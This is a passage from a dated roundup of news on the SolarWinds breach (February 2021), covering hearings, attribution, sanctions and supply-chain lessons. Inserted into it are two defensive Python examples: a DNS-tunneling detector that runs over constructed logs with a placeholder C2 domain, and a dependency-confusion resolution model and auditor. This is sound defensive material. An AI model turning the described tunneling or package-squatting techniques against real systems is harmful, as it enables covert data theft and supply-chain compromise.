Lawmakers and witnesses at the Senate Intelligence Committee’s hearing on SolarWinds emphasized the possibility of legislation mandating certain businesses to disclose some breaches to the federal government. Currently, there is no rule mandating a company like FireEye to disclose a breach to the federal government, even when national security is a concern.

Ref - SCMagazine

_______________________________________________________________________________________

(February 23, 2021)


Tech firms besides SolarWinds could have been used to hack targets

The hackers used a variety of legitimate software and cloud hosting services to access the systems of nine federal agencies and 100 private companies. They used Amazon Web Services cloud hosting to disguise their intrusions as benign network traffic. Additionally, the hackers didn't use the malware planted in SolarWinds' Orion products to breach nearly a third of the victims. Instead, they had access to other hacking techniques, all of which investigators are still unraveling.

Ref - CNET

_______________________________________________________________________________________

(February 23, 2021)


Reasons why SolarWinds was so vulnerable to a hack

SolarWinds outsourced much of its software engineering to cheaper programmers overseas, even though that typically increases the risk of security vulnerabilities. For a while, in 2019, the update server’s password for SolarWinds network management software was reported to be “solarwinds123.” Russian hackers were able to breach SolarWinds' own email system and lurk there for months.


_______________________________________________________________________________________

(February 23, 2021)


Biden administration preparing to sanction Russia for SolarWinds hacks

The Biden administration is preparing sanctions and other measures to punish Moscow for actions that go beyond the sprawling SolarWinds cyber espionage campaign to include a range of malign cyber activity and the near-fatal poisoning of a Russian opposition leader, said U.S. officials familiar with the matter.


_______________________________________________________________________________________

(February 23, 2021)


SolarWinds hack grabs senate spotlight 

The Senate Intelligence Committee, led by Senator Mark Warner, will convene for the first public hearing on the attack, which was disclosed in December. It will hear testimony from Sudhakar Ramakrishna, president and chief executive officer of SolarWinds, and Microsoft Corp. President Brad Smith, in addition to Crowdstrike Holdings Inc. CEO George Kurtz and Kevin Mandia, CEO of FireEye Inc.

Ref - Bloomberg 

_______________________________________________________________________________________

(February 23, 2021)


The Anatomy of the SolarWinds attack chain

The compromise of identity and manipulation of privileged access was instrumental in the success of the SolarWinds attack. Researchers are trying to deconstruct the attack so organizations can better understand what they’re up against and prioritize efforts to reduce the most risk.

Ref - CyberArk 

_______________________________________________________________________________________

(February 23, 2021)


Top executives from SolarWinds, Microsoft, FireEye, CrowdStrike face Senate grilling

Top executives at Texas-based software company SolarWinds, digital giant Microsoft and cybersecurity firms FireEye and CrowdStrike are expected to defend their companies’ responses to a sprawling series of breaches blamed on Russian hackers when they face the U.S. Senate’s Select Committee on Intelligence.

Ref - Reuters 

_______________________________________________________________________________________

(February 22, 2021)


The U.S. House committee hearing on 'SolarWinds' hack

The U.S. House of Representatives’ Oversight and Homeland Security Committees will hold a joint hearing on 26 February on cybersecurity incidents including the attack targeting SolarWinds Orion Software. Top executives from SolarWinds Corp, FireEye Inc, and Microsoft Corp will testify at the hearing.

Ref - Reuters

_______________________________________________________________________________________

(February 22, 2021)


SolarWinds-like breach could have happened to anyone

In the first of several public appearances, the CEO of SolarWinds is publicly discussing the breach of his company's software two months after reports surfaced that multiple government agencies may have been breached through a backdoor vulnerability. His message to others: this could have happened to anyone.

Ref - FCW

_______________________________________________________________________________________

(February 22, 2021)


Lessons learned from SolarWinds breach 

According to the CEO of SolarWinds, there are three lessons from the recent attack. The first is how to improve infrastructure security within the enterprise. The second is how to improve the build infrastructure within the enterprise. The third is how to improve software development processes and life cycles to the point where they essentially evolve into secure development lifecycle processes.

Ref - CSIS.org

_______________________________________________________________________________________

(February 22, 2021)


SolarWinds hackers continued attacking Microsoft until January

The SolarWinds hackers continued efforts to infiltrate Microsoft until early January, keeping up the assault even after Microsoft revealed its source code had been compromised. The hackers lost source repository access after Microsoft secured its compromised accounts, but the threat actor kept making unsuccessful attempts to regain access all the way until early January.

Ref - CRN 

_______________________________________________________________________________________

(February 22, 2021)


Researchers expecting another SolarWinds attack

People are too reliant on technology like email to protect themselves with digital walls they’ve long outgrown. There will certainly be another SolarWinds until we remember the more fundamental question of “what does the attacker want?” and work to apply it on all possible platforms.

Ref - SC Mag 

_______________________________________________________________________________________

(February 21, 2021)


National security adviser vows a quick response to SolarWinds hack

White House national security adviser Jake Sullivan said the White House has asked the intelligence community to do more work to sharpen the attribution made by the Trump administration. This includes details about how the hack occurred, the extent of the damage, and the scope and scale of the breach.

Ref - CBS News 

_______________________________________________________________________________________

(February 20, 2021)


Within weeks, the US will be prepared to take the first steps to respond to SolarWinds attacks

National security adviser Jake Sullivan has said that the US will be taking a series of steps to respond to the devastating SolarWinds cyber hack and hold accountable those responsible within a few weeks instead of months, as anticipated earlier. The Biden administration is focused on identifying more precisely the culprit behind the suspected Russian spying campaign that targeted at least nine federal agencies and at least 100 private-sector businesses.

Ref - CNN 

_______________________________________________________________________________________

(February 19, 2021)


SolarWinds hackers had access to Microsoft source code

The hackers behind the worst intrusion of U.S. government agencies in years won access to Microsoft’s secret source code for authenticating customers, potentially aiding one of their main attack methods. Microsoft had said before that the hackers had accessed some source code, but had not said which parts, or that any had been copied.

Ref - Reuters

_______________________________________________________________________________________

(February 19, 2021)


The scale of the SolarWinds breach is now visible

In a recent interview with CBS News’ 60 Minutes, Microsoft president Brad Smith answered many questions as to the scale of the attack and Microsoft’s unprecedented response to the incident. As to the scale, Smith and many others believe that the attack may have been the largest and most sophisticated the world has seen. Other reports estimate that 18,000 organizations may have been impacted by the attack.

Ref - PCrisk

_______________________________________________________________________________________

(February 18, 2021)


Microsoft recommends zero-trust architecture after SolarWinds attacks

The Microsoft Security Research Center, which has shared learnings and guidance throughout the Solorigate incident, confirmed that following the completion of their internal investigation they found no evidence that Microsoft systems were used to attack others. However, the tech firm recommended that organizations should deploy zero-trust architecture and defense-in-depth protection. 

Ref - Microsoft

_______________________________________________________________________________________

(February 19, 2021)


SolarWinds hackers had access to Microsoft’s secret source code

The hackers behind the intrusion of U.S. government agencies had access to Microsoft’s secret source code for authenticating customers. Some of the code was downloaded, the company said, which would have allowed the hackers even more freedom to hunt for security vulnerabilities, create copies with new flaws, or examine the logic for ways to exploit customer installations.

Ref - Reuters

_______________________________________________________________________________________

(February 18, 2021)


Need for a contact tracing approach after SolarWinds breach

According to researchers, the recent SolarWinds breach shows a need for a contact tracing approach for organizations to strengthen their own internal investigations. It can dramatically reduce the time it takes to discover how far an attacker has penetrated into their networks, and identify if other related systems in their supply chains, customers, and partner networks have also been compromised.

Ref - Fortune

_______________________________________________________________________________________

(February 18, 2021)


Microsoft pushes companies toward zero trust after SolarWinds breach

Vasu Jakkal, Microsoft corporate vice president of security, compliance and identity, has said that none of Microsoft’s internal systems were used to attack others because of the zero trust approach followed by the company. The probe also found no evidence of access to Microsoft’s production services or customer data.

Ref - SC Media

_______________________________________________________________________________________

(February 18, 2021)


SolarWinds attackers downloaded Azure and Exchange source code

Microsoft announced that the SolarWinds hackers gained access to source code for a limited number of Azure, Intune, and Exchange components. For a small number of repositories, there was additional access, and downloading of component source code. These repositories contained code for a small subset of Azure components, Intune components, and Exchange components.


_______________________________________________________________________________________

(February 18, 2021)


SolarWinds breach targeted 100 companies and took months of preparation

A White House team leading the investigation into the SolarWinds hack is worried that the breach of 100 US companies has the potential to make the initial compromise a much more serious threat in the future. Anne Neuberger, deputy national security advisor for Cyber and Emerging Technology at the White House, said in a press briefing that nine government agencies were breached, while many of the 100 private sector US organizations that were breached were technology companies.

Ref - ZDNet

_______________________________________________________________________________________

(February 18, 2021)


Efficacy of SolarWinds attack 

The sheer sophistication of the SolarWinds incident is fascinating. At a technical level, it is a multilayered infiltration involving custom malicious tooling, backdoors, and cloaked code, far beyond the skill of script kiddies so often seen exploiting more obvious errors. In addition, it was carried out with code that looked completely benign.


_______________________________________________________________________________________

(February 18, 2021)


White House planning for an executive action after SolarWinds hack

In an update on the investigation into the SolarWinds supply chain attack, Deputy National Security Adviser Anne Neuberger said that the Biden administration is preparing "executive action" to address security shortcomings that have come to light. Neuberger, who was recently named coordinator of the investigation into the attack, made her comments at a White House press briefing.


_______________________________________________________________________________________

(February 18, 2021)


SolarWinds attackers studied Azure’s secret source code

The hackers behind the worst intrusion of U.S. government agencies in years gained access to Microsoft's secret source code for authenticating customers, one of the biggest vectors used in the attacks. Microsoft revealed that its internal investigation had found that the hackers studied parts of the source code instructions for its Azure cloud programs related to identity and security, its Exchange email programs, and Intune management for mobile devices and applications.

Ref - Dell

_______________________________________________________________________________________

(February 18, 2021)


Learnings for the financial services sector from the SolarWinds attacks

The SolarWinds cyber-attack includes some important lessons for financial services institutions of all sizes. A key factor in avoiding a SolarWinds-style breach is operational resilience, which itself depends on having the right strategy. It is crucial to validate the security controls in place and test how effective they are. For this, the financial firms need a SOC that understands the system and monitors the threats, including what type of cyber-attack would be a disaster for the business.


_______________________________________________________________________________________

(February 18, 2020)


The debate on retaliation to SolarWinds breach

Reports came under fire from many infosec professionals, who criticized arguments in favor of launching offensive cyberattacks, also known as hacking back, against SolarWinds breach adversaries. Many infosec experts have warned that hacking back carries enormous risk and should not be part of U.S. cybersecurity policy.


_______________________________________________________________________________________

(February 18, 2021)


Did SolarWinds hack include voice, video, and messaging platforms?

While investigations regarding SolarWinds are ongoing and new information is being revealed on a near-daily basis, there are concerns about whether an advanced persistent threat played any role against Voice, Video, and Messaging Platforms in the SolarWinds attacks. These platforms usually involve SIP traffic, API remote access, and RTC, and have been in heavy use since the advent of the COVID-19 epidemic, so any threat to them may lead to another level of catastrophe.

Ref - Medium

_______________________________________________________________________________________

(February 18, 2021)


Hacker behind SolarWinds used U.S. networks

A sprawling cyber-attack that compromised popular software created by Texas-based SolarWinds Corp. was executed from within the U.S., according to a top White House official. The hackers launched the hack from inside the United States, which further made it difficult for the U.S. government to observe their activity.

Ref - Bloomberg

_______________________________________________________________________________________

(February 17, 2021)


An 82% increase observed in SolarWinds-style vendor email compromise attacks

Abnormal Security, a next-generation cloud email security company, released a new threat research report that reveals an 82% increase in the chance of companies getting attacked through SolarWinds-style vendor email compromise (VEC) during any given week. The company also found that these attacks can be very costly as it recently detected and stopped a $1.6M VEC attack.

Ref - Yahoo

_______________________________________________________________________________________

(February 17, 2021)


There could be 1,000 developers who had written malicious code used in the SolarWinds breach

Microsoft discovered that the SolarWinds breach was not the job of a small group of threat actors; instead, 1,000+ developers had worked on developing the malicious code in the first place. This implied that the attack was not just widespread but was developed and executed by a larger group.

Ref - CISOMAG

_______________________________________________________________________________________

(February 17, 2021)


Around 100 private organizations hit by SolarWinds attack

The deputy national security advisor for cyber and emerging technology confirmed that so far nine federal agencies and 100 private industry organizations have been compromised in the SolarWinds attacks. In addition, the attackers waged the attack from inside the US, making it difficult for the US government to observe their activity.


_______________________________________________________________________________________

(February 17, 2021)


Risk of SolarWinds-style attacks through vendor email compromise increased 82%

Abnormal Security has released a new threat research report that reveals an 82% increase in the chance of companies getting attacked through SolarWinds-style vendor email compromise (VEC) during any given week. The company also found that these attacks can be very costly as it recently detected and stopped a $1.6M VEC attack.

Ref - Yahoo 

_______________________________________________________________________________________

(February 16, 2021)


Importance of DNS security after SolarWinds breach

The SolarWinds attack underscores the importance of securing DNS traffic. DNS tunneling, where data is transmitted by appending it to recursive DNS queries, was chosen as the medium to steal customer data. Queries were sent to DNS command and control servers within the same region of breached enterprise networks to evade detection. 

Ref - Akamai
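The item above describes DNS tunneling as the exfiltration medium. The following is an added example, not code from Akamai or from this page, showing one detection heuristic a defender can run over resolver query logs: group queries by registered domain and flag domains that receive many distinct, long, high-entropy leftmost labels. The log lines, the log format (`<epoch> <client> <qname> <qtype>`), the domain `c2-placeholder.test`, and the thresholds are all constructed for the example; the "last two labels" registered-domain rule is a simplification, and a real deployment should use the Public Suffix List.

```python
"""Flag likely DNS tunneling from resolver query logs (added example).
The sample log below is constructed; none of the names are real indicators."""
import math
from collections import defaultdict

# Constructed query log: "<epoch> <client> <qname> <qtype>" per line.
SAMPLE_LOG = """\
1613462400 10.0.0.5 www.example.com A
1613462401 10.0.0.5 mail.example.com A
1613462402 10.0.0.7 cdn.example.org A
1613462403 10.0.0.9 7a4ql0m3tqf8c1nwz9.api.c2-placeholder.test A
1613462404 10.0.0.9 k2z9x8bq1v7h3mn5pr.api.c2-placeholder.test A
1613462405 10.0.0.9 q0w3e8r7t1y5u9i2op.api.c2-placeholder.test A
1613462406 10.0.0.9 a5s1d8f4g7h2j9k3lz.api.c2-placeholder.test A
1613462407 10.0.0.5 www.example.com AAAA
"""


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; encoded payloads score far higher than words."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str, suffix_labels: int = 2):
    """Crude eTLD+1 split: returns (registered_domain, remaining_labels).
    Assumption for the example: the last two labels are the registered domain."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-suffix_labels:]), labels[:-suffix_labels]


def parse_log(text: str):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, qname, qtype = parts
        yield {"ts": int(ts), "client": client, "qname": qname.lower(), "qtype": qtype}


def score_domains(records, min_unique=3, entropy_threshold=3.5, min_label_len=12):
    """Group queries by registered domain and flag domains whose leftmost labels look
    like encoded payloads: at least `min_unique` distinct subdomains, each of which is
    long and high-entropy. Returns {domain: stats} with a 'suspicious' flag."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(), "high_entropy": 0, "clients": set()})
    for r in records:
        domain, sub_labels = registered_domain(r["qname"])
        s = stats[domain]
        s["queries"] += 1
        s["clients"].add(r["client"])
        if sub_labels:
            s["subdomains"].add(".".join(sub_labels))
            leftmost = sub_labels[0]  # tunneled data usually rides in the leftmost label
            if len(leftmost) >= min_label_len and shannon_entropy(leftmost) >= entropy_threshold:
                s["high_entropy"] += 1
    result = {}
    for domain, s in stats.items():
        unique = len(s["subdomains"])
        result[domain] = {
            "queries": s["queries"],
            "unique_subdomains": unique,
            "high_entropy_labels": s["high_entropy"],
            "clients": sorted(s["clients"]),
            "suspicious": unique >= min_unique and s["high_entropy"] >= min_unique,
        }
    return result


if __name__ == "__main__":
    for domain, info in score_domains(parse_log(SAMPLE_LOG)).items():
        print(domain, info)
```

The thresholds are deliberately conservative: a CDN or anti-spam service also emits many unique subdomains, but those labels are usually short or low-entropy, so requiring both conditions keeps the false-positive rate manageable. Tune `min_unique` and `entropy_threshold` against a baseline of your own resolver traffic before alerting on the output.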

_______________________________________________________________________________________

(February 16, 2021)


Webroot recommendations after the SolarWinds attack

Webroot is offering tips to its MSP and small business customers after the SolarWinds hack. These include using security technology that incorporates threat intelligence for URLs, IP addresses, and files as part of a layered cybersecurity approach. Organizations should make sure to follow best practices within policies, and ensure devices are set to block high-risk and suspicious objects based on real-time intelligence criteria. Also, consider adding DNS Protection to your technology stack to deepen your protection around malicious IP addresses and URLs that are frequently used in attacks.

Ref - Webroot 
 
_______________________________________________________________________________________

(February 16, 2021)


Analysis of SUNBURST malware

The analysis of SUNBURST malware by FireEye disclosed that attackers hid malicious code within thousands of lines of legitimate code, compiled inside of digitally signed binaries. Attackers used the SolarWinds Orion platform to carry lateral movement traffic. They disabled dozens of endpoint security tools, including FireEye, and used DNS for Stage 1 and 2 C2 communications. They also introduced minimal custom malware into the environment post-exploitation, often “living off the land” via native Windows tools.

Ref - FireEye

_______________________________________________________________________________________

(February 16, 2021)


A new type of supply-chain attack hit MNCs including Apple and Microsoft

Security researcher Alex Birsan has unveiled a new technique called Dependency Confusion, or namespace confusion attack, which can execute counterfeit code on networks belonging to some of the popular enterprise giants, including Apple, Microsoft, and Tesla. By giving the submissions the same package names as dependencies used by the companies, Birsan was able to get these companies to download and install the counterfeit code, which could result in a SolarWinds-type supply chain attack.

Ref - Arstechnica 
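The dependency confusion items on this page (the March 6, March 3, March 1 and February 16 entries) all come down to one resolver behaviour: when a private index is merged with a public one and the highest version wins, a public package with the same name as an internal one gets picked. The following is an added example, written for this page and not taken from Birsan, Sonatype or any package manager, that models that merged resolution beside a scoped policy and audits a private index for names that a merged resolver would silently swap. The two index dictionaries, the package names and the versions are constructed; the version parser is a deliberate simplification (dotted integers only) and real tooling should use a proper PEP 440 or semver parser.

```python
"""Model merged-index resolution (the dependency confusion failure mode) against a
scoped policy, and audit a private index for swappable names. Added example;
the indexes below are constructed, not real registries."""
import re

# Constructed private index: {name: [versions]}. These names are "internal".
PRIVATE_INDEX = {
    "acme-billing-core": ["1.4.2", "1.4.1"],
    "acme-logging": ["0.9.0"],
}
# Constructed public index. "acme-billing-core" at 99.0.0 represents a squatted upload.
PUBLIC_INDEX = {
    "requests": ["2.25.1", "2.24.0"],
    "acme-billing-core": ["99.0.0"],
}
PRIVATE_NAMES = set(PRIVATE_INDEX)  # the allow-list of names that must never come from public


def parse_version(v: str):
    """Toy version key: '1.4.2' -> (1, 4, 2). Assumption: dotted integers only."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def highest(versions):
    return max(versions, key=parse_version) if versions else None


def resolve_merged(name, private_index=PRIVATE_INDEX, public_index=PUBLIC_INDEX):
    """Unsafe 'extra index' behaviour: candidates from both indexes compete on version,
    so a higher public version beats the internal package. Returns (source, version)."""
    candidates = [("private", v) for v in private_index.get(name, [])]
    candidates += [("public", v) for v in public_index.get(name, [])]
    if not candidates:
        return None
    return max(candidates, key=lambda c: parse_version(c[1]))  # ties keep the private entry


def resolve_scoped(name, private_index=PRIVATE_INDEX, public_index=PUBLIC_INDEX, private_names=PRIVATE_NAMES):
    """Hardened policy: a name declared internal is only ever served from the private
    index (never falling back to public); everything else comes from the public index."""
    if name in private_names:
        vs = private_index.get(name, [])
        return ("private", highest(vs)) if vs else None
    vs = public_index.get(name, [])
    return ("public", highest(vs)) if vs else None


def audit(private_index=PRIVATE_INDEX, public_index=PUBLIC_INDEX):
    """Report internal names that also exist publicly with a higher version, i.e. the
    exact cases where resolve_merged would choose the public package.
    Returns a list of (name, private_version, public_version)."""
    findings = []
    for name, private_versions in private_index.items():
        public_versions = public_index.get(name)
        if not public_versions:
            continue
        pv, pub = highest(private_versions), highest(public_versions)
        if parse_version(pub) > parse_version(pv):
            findings.append((name, pv, pub))
    return findings


if __name__ == "__main__":
    for name in ("acme-billing-core", "acme-logging", "requests"):
        print(name, "merged ->", resolve_merged(name), "| scoped ->", resolve_scoped(name))
    print("swappable:", audit())
```

The practical translations of `resolve_scoped` are a single private index that proxies the public registry and is the only index clients are configured with, explicit namespaces where the ecosystem supports them (npm scopes such as `@org/name`), and pinning with hashes so a substituted artifact fails verification. Running something like `audit()` on every publish of an internal package catches the collision the moment a same-named public package appears, which is the signal Sonatype was reporting in the March 1 entry.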

_______________________________________________________________________________________

(February 16, 2021)


A SolarWinds-like cyberattack targeted Centreon, French researchers disclose

French cybersecurity authorities have disclosed a SolarWinds-like supply-chain attack in which hackers targeted several major organizations by compromising the Centreon enterprise IT platform. The first evidence of the intrusion campaign dates back to 2017, with the attack lasting until 2020. It mostly affected IT providers, in particular web hosting providers.

Ref - ITPro 

_______________________________________________________________________________________

(February 16, 2021)


Microsoft reveals new details about sophisticated mega-breach

Microsoft has made some new revelations regarding the SolarWinds attacks and is calling the cyber-attack the most sophisticated of all time. According to Brad Smith, Microsoft has assigned 500 engineers to dig into the attack. Cyjax CISO Ian Thornton-Trump points out that the attackers had one chance to get the malware into place and have it do its work without revealing their compromise: if a build had failed because of the malicious code, their plot to infect Orion would have been exposed.

Ref - Forbes 

_______________________________________________________________________________________

(February 15, 2021)


Many SolarWinds customers failed to secure even after the breach came to light 

Many companies still expose SolarWinds Orion to the internet and have failed to take action following the disclosure of the massive SolarWinds breach. RiskRecon, a firm specialized in risk assessment, observed 1,785 organizations exposing Orion to the internet on December 13, 2020, shortly after the breach came to light, and the number dropped to 1,330 by February 1, 2021. However, only 8% of these companies have applied the Orion update (2020.2.4) in response to the breach.


_______________________________________________________________________________________

(February 15, 2021)


Microsoft found 1,000-plus developers' fingerprints on the SolarWinds hack

Microsoft president Brad Smith says that their analysis of the SolarWinds hack suggests the code behind the attack was the work of a thousand or more developers. Smith didn't say who those 1,000 developers worked for, but compared the SolarWinds hack to attacks on Ukraine that have been widely attributed to Russia.


_______________________________________________________________________________________

(February 15, 2021)


SolarWinds hack is the largest and most sophisticated attack ever - Microsoft’s President

A hacking campaign that used a U.S. tech company as a springboard to compromise a raft of U.S. government agencies is the largest and most sophisticated attack the world has ever seen, according to Microsoft Corp’s president Brad Smith. The SolarWinds breach could have compromised up to 18,000 SolarWinds customers that used the company’s Orion network monitoring software. It could take months to identify the compromised systems and expel the hackers.

Ref - Reuters

_______________________________________________________________________________________

(February 14, 2021)


How Russian spies hacked the US federal agencies during SolarWinds attacks

Brad Smith, the president of Microsoft, has said that, judging by the sophistication of the SolarWinds attacks, the attacker had the asymmetric advantage that comes with playing offense, and that it is almost certain these attacks are still continuing. Kevin Mandia, CEO of FireEye, disclosed that the intruders impersonated FireEye employees while snooping around inside its network, stealing the proprietary tools FireEye uses to test its clients' defenses along with its intelligence reports on active cyber threats.

Ref - CBS News 

_______________________________________________________________________________________

(February 14, 2021)


The SolarWinds attack could be still ongoing

The SolarWinds attack was unprecedented in audacity and scope and the Russian spies went rummaging through the digital files of the U.S. departments of Justice, State, Treasury, Energy, and Commerce. For nine months, they had unfettered access to top-level communications, court documents, even nuclear secrets. And by all accounts, it's still going on and hackers could still be stealing information.

Ref - CBS News

_______________________________________________________________________________________

(February 14, 2021)


The U.S. must strike back after SolarWinds breach

James Lewis, a director at the Center for Strategic and International Studies, said fear of escalation has held the U.S. back from punishing Russia, and other nation-states when they step out of line. He suggested the U.S. experiment with tactics to find creative ways of inflicting revenge on Russia.

Ref - CBS News

_______________________________________________________________________________________

(February 12, 2021)


CISOs' 2021 priorities after SolarWinds attack 

After the SolarWinds attack, CISOs will need to redraw contracts with third-party providers of software, hardware, and services to explicitly demand that the providers commit to securing their own environments. This includes ensuring they use third-party static code analysis, regular security scanning of local and cloud-based environments, DevSecOps practices, and code integrity checks. In addition, they must adopt the latest encryption and authentication technologies.


_______________________________________________________________________________________

(February 12, 2021)

US court system is demanding changes to court document storage after SolarWinds breach

Multiple U.S. senators have demanded a hearing on what court officials know about the hackers' access to sensitive filings. A number of courthouses are now uploading documents to a single computer. All 13 of the country's federal circuit courts have separate measures and rules they take to protect the security of documents filed, but now everything may need to change due to the attack.


_______________________________________________________________________________________

(February 12, 2021)


Orion servers exposed to Internet drop by 25% since SolarWinds breaches

One in four SolarWinds Orion servers exposed to the internet at the time of an era-defining espionage campaign has been taken off the internet. This could mean different things to different companies. Some may have put the servers inside of a firewall. Others may have found a replacement for SolarWinds. Yet others may have deactivated the servers during remediation.

Ref - SC Media 

_______________________________________________________________________________________

(February 12, 2021)


Russians outsmarted DHS cyberattack detection program in SolarWinds hack

From a software engineering perspective, the SolarWinds attack is probably the largest and most sophisticated attack the world has ever seen. The alleged Russian attackers had huge resources at their disposal, and probably more than 1,000 engineers worked on these attacks.

Ref - CBS News 

_______________________________________________________________________________________

(February 11, 2021)


Unanswered questions about SolarWinds breach

There is a considerable fear that the attackers behind the SolarWinds breach may have gained deep, persistent, and almost undetectable access on networks belonging to numerous organizations in sectors including manufacturing, industrial, construction, and logistics. The incident also resurfaced old concerns over supply chain vulnerabilities and some new ones over the ability of even the best security tools and controls to detect highly targeted attacks.


_______________________________________________________________________________________

(February 11, 2021)


New stats about suspicious network activity during peak of SUNBURST attack

ExtraHop threat researchers have found that between late March 2020 and early October 2020, detections of probable malicious activity increased by approximately 150 percent. Activity patterns outlined in the report indicate that the SUNBURST attackers were successful in flying under the radar of these detection methods either by disabling them or by redirecting their approach before they could be detected.

Ref - Yahoo 

_______________________________________________________________________________________

(February 11, 2021)


How suspected Chinese hackers compromised USDA’s National Finance Center

Suspected Chinese hackers exploited a different SolarWinds flaw from the one used by the Russian attackers to compromise the National Finance Center under the U.S. Department of Agriculture (USDA). It is said that the suspected Chinese hacking incident affected only a single customer and that a security update was released in December 2020.

Ref - CPO Magazine 

_______________________________________________________________________________________

(February 10, 2021)


Maritime facilities using SolarWinds are ordered to report breaches

The U.S. Coast Guard (USCG) has ordered MTSA-regulated facilities and vessels using SolarWinds software for critical functions to report security breaches in case of suspicions of being affected by the SolarWinds supply-chain attack. USCG's order was delivered through a Marine Safety Information Bulletin published on continued awareness regarding the ongoing exploitation of SolarWinds software.


_______________________________________________________________________________________

(February 10, 2021)


A senior official is leading the inquiry into SolarWinds breach

The White House has announced that it has put a senior national security official in charge of the response to the broad Russian breach of government computers, only hours after the Democratic chairman of the Senate Intelligence Committee criticized the disjointed and disorganized response in the opening weeks of the Biden administration.


_______________________________________________________________________________________

(February 10, 2021)


SolarWinds breach showed that the U.S. is most targeted and vulnerable

The U.S. is one of the most advanced, if not the most advanced cyber superpower in the world, but it’s also most targeted and it’s most vulnerable. Part of the problem is that the U.S. has spent more energy on hacking other countries than on defending itself. This attack has hit the Department of Homeland Security — the very agency charged with keeping the US safe.

Ref - NPR

_______________________________________________________________________________________

(February 10, 2021)


More cyberattacks like SolarWinds could be expected from Russia

The federal government's former top cybersecurity official warned lawmakers that the SolarWinds Orion hack is likely not the worst attack the United States may see from Russia. The federal agencies investigating the attack as well as third-party cybersecurity experts have largely concurred the breach appears to be espionage.

Ref - FCW

_______________________________________________________________________________________

(February 10, 2021)


SolarWinds breach put the spotlight on supply chain attacks

The recent SolarWinds breach has proved how devastating a well-executed supply chain attack can be. What sets it apart from other cases is its peculiar victim profiling and validation scheme. Through the SolarWinds Orion IT packages, the attackers reached around 18,000 customers and stayed inside targeted victims' networks for months without raising any alarms.

Ref - CSO

_______________________________________________________________________________________

(February 10, 2021)


Security of supply chains is actually worse than everyone thinks

Several indicators suggest that the security of supply chains is in a worse state than commonly assumed. Many enterprise networks consist of an untold number of disparate products, duct-taped together through poorly documented interfaces. Most organizations have no clue they are sitting ducks for average attackers of moderate skill, much less for nation-state-backed adversaries with unlimited resources.

Ref - ZDNet

_______________________________________________________________________________________

(February 9, 2021)


The encryption backdoor from 2015 could be behind the SolarWinds attacks

While it is still not clearly known how hackers altered the code of SolarWinds software, many point to the Juniper Networks 2015 incident as a precursor to the recent hack. In a letter addressed to the NSA, members of Congress questioned whether the agency knew about the encryption backdoor in the Juniper Networks products.

Ref - NordVPN 

_______________________________________________________________________________________

(February 9, 2021)


Lessons from SolarWinds attack for federal agencies

There are several lessons for federal agencies to take away from the recent SolarWinds attacks. These include making sure the response actually reduces risk (turning off security updates and patches won't). It also makes sense to choose reputable, responsive suppliers that adhere to security standards and best practices. In addition, agencies should follow least privilege and Zero Trust policies and protect sensitive data with adequate controls.

Ref - Varonis

_______________________________________________________________________________________

(February 9, 2021)


The U.S. must prioritize cybersecurity after the SolarWinds breach

The SolarWinds hack is considered an egregious act of espionage, stealing data, and establishing unauthorized access to information technology. Thus, nations must move past jurisdictional grandstanding to develop a national cybersecurity strategy. There must be a comprehensive approach to cybersecurity that keeps the United States a step ahead of its adversaries.

Ref - CNBC

_______________________________________________________________________________________

(February 9, 2021)


What could be the purpose behind the SolarWinds hack?

The purpose of the SolarWinds hack remains largely unknown. Still, there are many reasons hackers would want to get into an organization's system, including having access to future product plans or employee and customer information held for ransom. It is also not yet clear what information, if any, hackers stole from government agencies. But the level of access appears to be deep and broad.


_______________________________________________________________________________________

(February 9, 2021)


SolarWinds breach has created disturbances for security worldwide

While the scope of the Solorigate attack is substantial, the scale of sophisticated deception employed by the malicious actors is even more significant. The SolarWinds security breach highlights the need for organizations at the end of the digital development and supply pipeline to actively scan, monitor, and manage all software updates, no matter where they come from or where they sit in the application stack.

Ref - Forbes 

_______________________________________________________________________________________

(February 9, 2021)


The SolarWinds hack was not inevitable

The SolarWinds hack was a major breach of national security th